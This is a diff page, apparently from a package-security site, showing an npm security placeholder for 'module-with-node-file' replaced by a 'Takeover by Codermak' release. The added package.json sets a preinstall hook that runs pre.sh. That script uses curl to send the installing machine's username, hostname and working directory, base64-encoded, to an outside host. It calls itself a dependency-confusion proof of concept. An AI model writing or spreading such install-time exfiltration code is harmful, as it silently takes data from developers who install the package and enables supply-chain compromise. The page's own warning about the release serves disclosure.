module-with-node-file 0.0.1-security → 3.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of module-with-node-file might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -5
  2. package/index.js +1 -0
  3. package/package.json +12 -3
  4. package/pre.sh +3 -0
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=module-with-node-file for more information.
1
+ # Takeover by Codermak
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('================ TAKEOVER by Codermak ================')
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "module-with-node-file",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "3.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "./pre.sh module-with-node-file"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/codermakhackerone"
12
+ },
13
+ "author": "",
14
+ "license": "ISC"
6
15
  }
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl http://kaspat.com/bugbounty/dependency-confusion-poc.php -H "Package: $1" -H "Whoami: $(whoami | base64)" -H "Hostname: $(hostname | base64)" -H "Pwd: $(pwd | base64 -w 2000)"